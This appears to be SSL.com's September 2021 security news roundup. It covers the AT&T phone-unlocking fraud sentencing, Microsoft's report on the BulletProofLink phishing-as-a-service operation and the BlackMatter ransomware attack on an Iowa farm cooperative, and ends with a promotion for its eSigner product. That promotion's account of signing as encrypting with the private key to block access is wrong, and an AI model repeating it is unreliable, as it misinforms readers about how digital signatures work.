September has seen a lot of newsworthy events in the field of internet security. Join us as we tackle cybersecurity progresses and risks revelations that happened in the past month.
Cybercriminal Sentenced to 12 Years in Prison for Heading a 7-Year Illegal Phone Unlocking Scheme
Per the September 16 news release from the Department of Justice, Pakistani citizen Muhammad Fahd received a 12-year prison sentence for orchestrating an illegal unlock of millions of phones that siphoned money from AT&T in a span of 7 years. The elaborate cyber fraud caused AT&T to lose more than $200 million.
Starting in 2012, employees of a Washington-based AT&T call center were bribed by Fahd to utilize their company credentials and unlock phone “fingerprints” also known as International Mobile Equipment Identity (IMEI). Eventually, he bribed the accomplices to download malware into the company’s computer systems, enabling him to unlock phones remotely from Pakistan.
The fraud exploited the subsidy and installment plans being offered by AT&T to customers, which aimed to lessen the price of expensive mobile phones. Customers were able to buy the phones for a cheaper price but these were bound to AT&T’s networks. With the phones unlocked by Fahd and his cohorts, AT&T was dislodged as the sole carrier and the account holder was freed from completing payment obligations.
The bribed AT&T employees were directed by Fahd to create bank accounts for fake businesses, receive deposits to those accounts, and to create fake billing documents. He then partnered with online retailers to sell his illegal phone unlocking services.
In 2013, AT&T began using a new system that posed a barrier to Fahd’s unlocking scheme. To counter this, he resorted to hiring a software engineer who designed the malware that was able to bypass AT&T’s barriers. The conniving employees fed Fahd with intelligence on the new system and installed the malware on their company’s computers which contained access information of the other employees.
The scheme resulted in nearly 2 million phones being illegally unlocked and not completing payments to AT&T. It was only in 2018 when Fahd was arrested.
SSL.com’s Takeaway: Humans are prone to enticements in the face of huge monetary rewards. The way to combat this is for a company to invest in strong cybersecurity infrastructure that can reduce human mistakes and has systems in place that can prevent their gatekeeping employees from being bribed by a cybercriminal.
Microsoft exposes Phishing as a Service (PhaaS) Operation
Microsoft’s cybersecurity team, the 365 Defender Threat Intelligence Team, discovered a new way by which phishing is executed by cyber criminals.
Referred to as BulletProofLink or Anthrax, this model appears to be a development of phishing kits – albums of fake web page templates which copy the login pages of target websites.
Microsoft states that there are phishing service providers that offer a package deal – from making the phishing template, hosting, and actual conduct of phishing. Those who subscribe to this deal do not have to actively infiltrate computer systems. Instead, they conveniently receive stolen login credentials sent to them by the PhAAS providers.
In Microsoft’s security blog, they describe how the BulletProofLink phishing infrastructure has similarly alarming threats as the Ransomware as a Service (Raas):
“The PhaaS working model as we’ve described it thus far is reminiscent of the ransomware-as-a-service (RaaS) model, which involves double extortion. The extortion method used in ransomware generally involves attackers exfiltrating and posting data publicly, in addition to encrypting them on compromised devices, to put pressure on organizations to pay the ransom. This lets attackers gain multiple ways to assure payment, while the released data can then be weaponized in future attacks by other operators. In a RaaS scenario, the ransomware operator has no obligation to delete the stolen data even if the ransom is already paid.
We have observed this same workflow in the economy of stolen credentials in phishing-as-a-service. With phishing kits, it is trivial for operators to include a secondary location for credentials to be sent to and hope that the purchaser of the phish kit does not alter the code to remove it. This is true for the BulletProofLink phishing kit, and in cases where the attackers using the service received credentials and logs at the end of a week instead of conducting campaigns themselves, the PhaaS operator maintained control of all credentials they resell.”
Microsoft states that The BulletProofLink service is responsible for the staggering attack to 300,000 subdomains and currently offers phishing pages for well-known companies including American Express, Dropbox, AT&T, Alibaba, and AOL.
SSL.com’s Takeaway: Increasing the capabilities and knowledge of company employees when it comes to cybersecurity will help in combating phishing attacks. Consider a study done by Stanford University and Tessian which revealed that 88% of data breaches are caused by employees who click on hackers’ emails thinking that these came from legitimate sources.
Russian Hackers Attack a Large Farming Cooperative in Iowa
A Washington Post article reports the case of an Iowa-based farming cooperative, NEW Cooperative, which was attacked by a Russian ransomware gang calling themselves BlackMatter. The cyber criminals demanded $5.9 million payment in exchange for not releasing private information which they claim they have stolen, and restoring the coop’s access to their computer systems that they use for feeding millions of cattle, chickens, and pigs.
NEW Cooperative is member-owned with 60 operating properties throughout central, western, and north Iowa. They run grain storage elevators, sell fertilizers, feed, and seeds. They also provide soil mapping and field management.
In their conversation with the cyber crooks, NEW Cooperative asked why they were attacked despite BlackMatter’s statement that they would not target critical infrastructure facilities. BlackMatter responded by saying that they did not consider the cooperative to be in that category.
NEW Cooperative warned that the attack would lead to disruption in the grain, pork and chicken supply chain. They further stated that their software manages around 40% of the country’s grain production and their feed schedules take care of 11 million animals.
BlackMatter is strongly theorized to be a reincarnated version of the DarkSide ransomware gang which went AWOL after the huge attack they made last May. As discussed in our previous article, the DarkSide gang was responsible for the Colonial Pipeline attack that debilitated gas supplies in the Southeastern states.
Among the data claimed to have been stolen by BlackMatter were financial information (bills, invoices, statements), social security numbers of employees, research and development papers, and legal documents.
SSL.com’s Takeaway: The recent Colonial Pipeline attack should serve as a strong warning to large industrial companies that even if they pay the ransom, there is no assurance that the cyber crooks will fully restore their access. Large industrial companies and cooperatives should immediately consult cybersecurity firms so that their risk level can be assessed and their online security can be strengthened.
SSL.com’s eSigner Cloud Signing System Goes Full Launch
As for our own company update, September 2021 became the first month for the commercial launch of our eSigner Cloud Signing System.
SSL.com’s eSigner increases the cybersecurity infrastructure of companies by allowing them to place internationally trusted digital signatures to important documents that they internally and externally communicate online including legal documents, copyrighted papers, billing records, employee information, and others.
Companies can also safeguard software and computer applications that they use in their work through eSigner. If installation drivers for these tools have to be sent through the internet, the receiving parties can be confident that they are not downloading malware. This is because eSigner’s use of PKI technology securely encrypts the file with the sender’s private key and prevents it from being accessed unless the receiving party has the corresponding public key. With the file being uniquely locked, the receiver can be sure that the file really came from the correct entity.
As evident by the increasingly widespread adaptation of cloud technology, cloud-based file storage and security has been proven to be cheaper and provides more protection from data theft and loss compared to hardware systems.
eSigner is fully compatible with the cloud signing standard of Cloud Signature Consortium – an international group of organizations belonging to the government, academe, and the cybersecurity industry. eSigner document signatures are also legal and enforceable under the United States Electronic Signatures in Global and National Commerce (ESIGN) act and the laws of many other countries worldwide.